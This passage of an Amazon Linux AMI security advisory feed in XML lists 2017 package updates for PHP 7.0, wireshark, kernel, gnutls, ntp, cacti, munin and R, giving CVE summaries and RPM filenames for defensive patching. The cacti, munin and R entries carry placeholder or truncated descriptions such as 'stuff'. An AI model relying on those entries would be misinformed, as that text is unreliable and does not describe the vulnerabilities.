release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.16-1.21.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.16-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-813</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-813: medium priority package update for wireshark</title><issued date="2017-04-04 12:00:00" /><updated date="2017-04-04 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3813:
A flaw was found in the way packet reassembly code of wireshark would parse a packet which could leak memory. An attacker could use this flaw to crash wireshark by sending a specially crafted packet onto the wire or by convincing wireshark user to read malformed packet trace file.
1222438:
CVE-2015-3813 wireshark: Reassembly memory leak (wnpa-sec-2015-16)
CVE-2015-3812:
A flaw was found in X11 dissector of wireshark of which an attacker could make wireshark consume excessive CPU resources which could make system unresponsive by injecting specially crafted packet onto the wire or by convincing wireshark user to read malformed packet trace file.
1222437:
CVE-2015-3812 wireshark: X11 memory leak (wnpa-sec-2015-15)
CVE-2015-3811:
A flaw was found in WCP dissector of wireshark of which an attacker could crash wireshark by injecting a specially crafted packet onto the wire or by convincing wireshark user to read malformed packet trace file.
1222436:
CVE-2015-3811 wireshark: WCP dissector crash (wnpa-sec-2015-14)
CVE-2013-4075:
A flaw was found in GMR (Geo-Mobile Radio) 1 BCCH protocol dissector of wireshark which an attacker can trigger a denial of service attack and crash wireshark by sending a specially crafted packet onto the wire or by convincing wireshark user to read malformed packet trace file.
972680:
CVE-2013-4075 wireshark: DoS (crash) in the GMR-1 BCCH dissector (wnpa-sec-2013-33)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4075" title="" id="CVE-2013-4075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3811" title="" id="CVE-2015-3811" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3812" title="" id="CVE-2015-3812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3813" title="" id="CVE-2015-3813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-25.22.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-25.22.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-25.22.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="25.22.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-25.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-814</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-814: medium priority package update for kernel</title><issued date="2017-04-06 21:16:00" /><updated date="2017-04-17 16:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6353:
It was found that the code in net/sctp/socket.c in the Linux kernel through 4.10.1 does not properly restrict association peel-off operations during certain wait states, which allows local users to cause a denial of service (invalid unlock and double free) via a multithreaded application. This vulnerability was introduced by CVE-2017-5986 fix (commit 2dcab5984841).
1428907:
CVE-2017-6353 kernel: Possible double free in stcp_sendmsg() (incorrect fix for CVE-2017-5986)
CVE-2017-5986:
It was reported that with Linux kernel, earlier than version v4.10-rc8, an application may trigger a BUG_ON in sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is waiting on it to queue more data, and meanwhile another thread peels off the association being used by the first thread.
1420276:
CVE-2017-5986 kernel: Reachable BUG_ON from userspace in sctp_wait_for_sndbuf
CVE-2017-5669:
The do_shmat function in ipc/shm.c in the Linux kernel, through 4.9.12, does not restrict the address calculated by a certain rounding operation. This allows privileged local users to map page zero and, consequently, bypass a protection mechanism that exists for the mmap system call. This is possible by making crafted shmget and shmat system calls in a privileged context.
1427239:
CVE-2017-5669 kernel: Shmat allows mmap null page protection bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5669" title="" id="CVE-2017-5669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5986" title="" id="CVE-2017-5986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6353" title="" id="CVE-2017-6353" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.20-10.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.20" release="10.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.20-10.30.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.20" release="10.30.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.20-10.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-815</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-815: medium priority package update for gnutls</title><issued date="2017-04-06 21:21:00" /><updated date="2017-04-17 16:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5337:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2017-5336:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2017-5335:
* Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash.
CVE-2016-8610:
* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections form other clients.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610" title="" id="CVE-2016-8610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5335" title="" id="CVE-2017-5335" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5336" title="" id="CVE-2017-5336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5337" title="" id="CVE-2017-5337" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:0574.html" title="" id="RHSA-2017:0574" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.12.23" release="21.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.12.23-21.18.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.12.23-21.18.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.12.23" release="21.18.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.12.23-21.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-816</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-816: medium priority package update for ntp</title><issued date="2017-04-20 05:54:00" /><updated date="2017-04-20 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6464:
A vulnerability was discovered in the NTP server&#039;s parsing of configuration directives. A remote, authenticated attacker could cause ntpd to crash by sending a crafted message.
1433987:
CVE-2017-6464 ntp: Denial of Service via Malformed Config
CVE-2017-6463:
A vulnerability was discovered in the NTP server&#039;s parsing of configuration directives. A remote, authenticated attacker could cause ntpd to crash by sending a crafted message.
1434002:
CVE-2017-6463 ntp: Authenticated DoS via Malicious Config Option
CVE-2017-6462:
A vulnerability was found in NTP, in the parsing of packets from the /dev/datum device. A malicious device could send crafted messages, causing ntpd to crash.
1433995:
CVE-2017-6462 ntp: Buffer Overflow in DPTS Clock
CVE-2017-6458:
A vulnerability was found in NTP, in the building of response packets with custom fields. If custom fields were configured in ntp.conf with particularly long names, inclusion of these fields in the response packet could cause a buffer overflow, leading to a crash.
1434005:
CVE-2017-6458 ntp: Potential Overflows in ctl_put() functions
CVE-2017-6451:
A vulnerability was found in NTP, in the legacy MX4200 refclock implementation. If this refclock was compiled in and used, an attacker may be able to induce stack overflow, leading to a crash or potential code execution.
1434011:
CVE-2017-6451 ntp: Improper use of snprintf() in mx4200_send()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6451" title="" id="CVE-2017-6451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6458" title="" id="CVE-2017-6458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6462" title="" id="CVE-2017-6462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6463" title="" id="CVE-2017-6463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464" title="" id="CVE-2017-6464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-44.34.amzn1.noarch.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-44.34.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-44.34.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-44.34.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-44.34.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="44.34.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-44.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-817</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-817: medium priority package update for cacti</title><issued date="2017-04-20 05:59:00" /><updated date="2017-04-20 22:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4000:
CVE-2014-4000
An
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4000" title="" id="CVE-2014-4000" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.0.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.0.4-1.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-818</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-818: medium priority package update for munin</title><issued date="2017-04-20 06:03:00" /><updated date="2017-04-20 22:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6188:
stuff
CVE-2017-6188
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6188" title="" id="CVE-2017-6188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-cgi" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.30-5.38.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.30" release="5.38.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.30-5.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-819</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-819: medium priority package update for R</title><issued date="2017-04-20 06:04:00" /><updated date="2017-04-20 22:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8714:
stuff
1363982: stuff
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8714" title="" id="CVE-2017-8714" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="R-core-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-debuginfo" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-debuginfo-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-java-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-java" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-devel-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="libRmath-static" version="3.3.3" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-static-3.3.3-1.51.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-java-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-core-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-debuginfo" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-debuginfo-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R-java" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath-devel" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-devel-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath-static" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-static-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="libRmath" version="3.3.3" release="1.51.amzn1" epoch="0" 